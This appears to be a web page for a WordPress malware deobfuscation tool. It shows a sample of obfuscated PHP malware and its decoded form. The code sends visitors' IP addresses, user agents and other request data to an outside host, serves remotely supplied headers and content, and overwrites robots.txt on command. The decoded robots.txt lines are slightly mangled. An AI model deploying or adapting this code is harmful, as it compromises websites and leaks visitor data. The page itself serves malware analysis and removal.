Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php ErROr_rEPOrTiNg(RoUNd(0+0+0+0+0)); $wScbRh="z\152\61\63\60\63"; $qzwdV="s\171\61"; if(PREg_mAtch("/\152\160\62\60\62\63/s\151",$_SERVER["\122EQU\105ST_\125\122I"])==RouND(0.16633+0.1230147+0.0884+0.22813+0.0903841+0.12995+0.1738)) { if(PrEG_matCH("\57jp\62\60\62\63cw\167\57\163i",$_SERVER["...



Obfuscated php code

<?php ErROr_rEPOrTiNg(RoUNd(0+0+0+0+0)); $wScbRh="z\152\61\63\60\63"; $qzwdV="s\171\61"; if(PREg_mAtch("/\152\160\62\60\62\63/s\151",$_SERVER["\122EQU\105ST_\125\122I"])==RouND(0.16633+0.1230147+0.0884+0.22813+0.0903841+0.12995+0.1738)) { if(PrEG_matCH("\57jp\62\60\62\63cw\167\57\163i",$_SERVER["\122EQU\105ST_\125\122I"])==RounD(0+0+0+0+0+0+0)) { HEADer("\110TTP\57\61\56\60\40\64\60\64 \116\157t \106\157\165\156d"); } echo "HT\124P\57\61\56\60\40\64\60\64 No\164 Fo\165\156d_\137\137".$wScbRh."__\137".$qzwdV; exit; } $VBp="\150\164\164p\72/\57".$wScbRh."\56j\145wi\163hl\145av\145\56co\155"; $VFx="\57i\156d\145x\56\160\150p\77\126\123\75".$qzwdV."\46G\120\75".$wScbRh; $rQx=array( "\123CRI\120\124\137NAME", "\122EQU\105ST_\125\122I", "\110T\124\120\123", "R\105Q\125\105ST\137\123C\110EM\105", "\123ERV\105R\137P\117R\124", "REM\117TE_\101DD\122", "H\124T\120\137R\105\106E\122E\122", "H\124T\120\137A\103CE\120T_LA\116GUAG\105", "H\124TP\137\125SE\122\137\101\107\105\116T", "HT\124P\137\110O\123T" ); foreach($rQx as $Rv) { $wQvS=isset($_SERVER[$Rv])?$_SERVER[$Rv]:''; $VyYq=baSE64_ENcOdE(TRIM($wQvS)); $VyYq=Str_rEplaCE("\53","\55",$VyYq); $VyYq=sTr_RePlace("\57","\137",$VyYq); $VyYq=str_rEPLace("=","\56",$VyYq); $VFx.="\46".$Rv."=".$VyYq; } $cft=$VBp.$VFx; $nH=CUrl_InIt(); curL_SEtoPT($nH,CURLOPT_URL,$cft); CurL_sEToPT($nH,CURLOPT_RETURNTRANSFER,ROund(0.38886311+0.1183295+0.1847+0.308121)); cURl_SetoPT($nH,CURLOPT_CONNECTTIMEOUT,ROUnD(1.774809+1.12595+2.360051+0.394402+4.34478372)); $lzq=Curl_exEC($nH); $lzq=TRIM($lzq); cuRL_CLoSe($nH); if(empty($lzq)) { $lzq=fILE_Get_conteNtS($cft); } $lzq=tRiM($lzq); $COZUy=EXploDE("|@\43$\174",$lzq); $lwPb=COunt($COZUy); if($lwPb<3) { heADeR("\110TTP\57\61\56\60\40\64\60\64 \116\157t \106\157\165\156d"); exit; }else { $wSrkv=tRIm($COZUy[rOUnd(0+0+0+0+0+0+0+0)]); if(!empty($wSrkv)) { hEadeR($wSrkv); } $RCpH=trIm($COZUy[ROund(0.013+0.4176062+0.411101+0.01344319+0.145)]); if(!empty($RCpH)) { echo $RCpH; } $Tr=tRIM($COZUy[$lwPb-RoUnD(0.116+0.328+0.557)]); if($Tr=="e\170it") { exit; } if($Tr=="p\151\156g") { $YdpAT="\125se\162-a\147ent:\52".PHP_EOL; $YdpAT.="Allow\72\57".PHP_EOL; $Aam=ExPlOde("<br\57>",$RCpH); aRRAY_pOP($Aam); foreach($Aam as $Cblrq) { $YdpAT.="\123it\145\155\141p:".$Cblrq.PHP_EOL; } $LOQAGb=FOpeN($_SERVER["D\117\103\125\115\105\116T_\122O\117T"]."\57r\157\142o\164s\56t\170\164","\167"); FwritE($LOQAGb,$YdpAT); FclOSe($LOQAGb); echo "r\157bo\164\163.t\170t\40d\157ne"; exit; } } ?>

Decoded(de-Obfuscated) php code

<?php

ErROr_rEPOrTiNg(RoUNd(0));
$wScbRh = "zj1303";
$qzwdV = "sy1";
if (PREg_mAtch("/jp2023/si", $_SERVER["REQUEST_URI"]) == RouND(1.0000088)) {
    if (PrEG_matCH("/jp2023cww/si", $_SERVER["REQUEST_URI"]) == RounD(0)) {
        HEADer("HTTP/1.0 404 Not Found");
    }
    echo "HTTP/1.0 404 Not Found___" . $wScbRh . "___" . $qzwdV;
    exit;
}
$VBp = "http://" . $wScbRh . ".jewishleave.com";
$VFx = "/index.php?VS=" . $qzwdV . "&GP=" . $wScbRh;
$rQx = array("SCRIPT_NAME", "REQUEST_URI", "HTTPS", "REQUEST_SCHEME", "SERVER_PORT", "REMOTE_ADDR", "HTTP_REFERER", "HTTP_ACCEPT_LANGUAGE", "HTTP_USER_AGENT", "HTTP_HOST");
foreach ($rQx as $Rv) {
    $wQvS = isset($_SERVER[$Rv]) ? $_SERVER[$Rv] : '';
    $VyYq = baSE64_ENcOdE(TRIM($wQvS));
    $VyYq = Str_rEplaCE("+", "-", $VyYq);
    $VyYq = sTr_RePlace("/", "_", $VyYq);
    $VyYq = str_rEPLace("=", ".", $VyYq);
    $VFx .= "&" . $Rv . "=" . $VyYq;
}
$cft = $VBp . $VFx;
$nH = CUrl_InIt();
curL_SEtoPT($nH, CURLOPT_URL, $cft);
CurL_sEToPT($nH, CURLOPT_RETURNTRANSFER, ROund(1.0000136099999999));
cURl_SetoPT($nH, CURLOPT_CONNECTTIMEOUT, ROUnD(9.999995719999999));
$lzq = Curl_exEC($nH);
$lzq = TRIM($lzq);
cuRL_CLoSe($nH);
if (empty($lzq)) {
    $lzq = fILE_Get_conteNtS($cft);
}
$lzq = tRiM($lzq);
$COZUy = EXploDE("|@#\$|", $lzq);
$lwPb = COunt($COZUy);
if ($lwPb < 3) {
    heADeR("HTTP/1.0 404 Not Found");
    exit;
} else {
    $wSrkv = tRIm($COZUy[rOUnd(0)]);
    if (!empty($wSrkv)) {
        hEadeR($wSrkv);
    }
    $RCpH = trIm($COZUy[ROund(1.00015039)]);
    if (!empty($RCpH)) {
        echo $RCpH;
    }
    $Tr = tRIM($COZUy[$lwPb - RoUnD(1.0010000000000001)]);
    if ($Tr == "exit") {
        exit;
    }
    if ($Tr == "ping") {
        $YdpAT = "User-agent:*PHP_EOL";
        $YdpAT = "User-agent:*PHP_EOLAllow:/PHP_EOL";
        $Aam = ExPlOde("<br/>", $RCpH);
        aRRAY_pOP($Aam);
        foreach ($Aam as $Cblrq) {
            $YdpAT .= "Sitemap:" . $Cblrq . PHP_EOL;
        }
        $LOQAGb = FOpeN($_SERVER["DOCUMENT_ROOT"] . "/robots.txt", "w");
        FwritE($LOQAGb, $YdpAT);
        FclOSe($LOQAGb);
        echo "robots.txt done";
        exit;
    }
}

Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.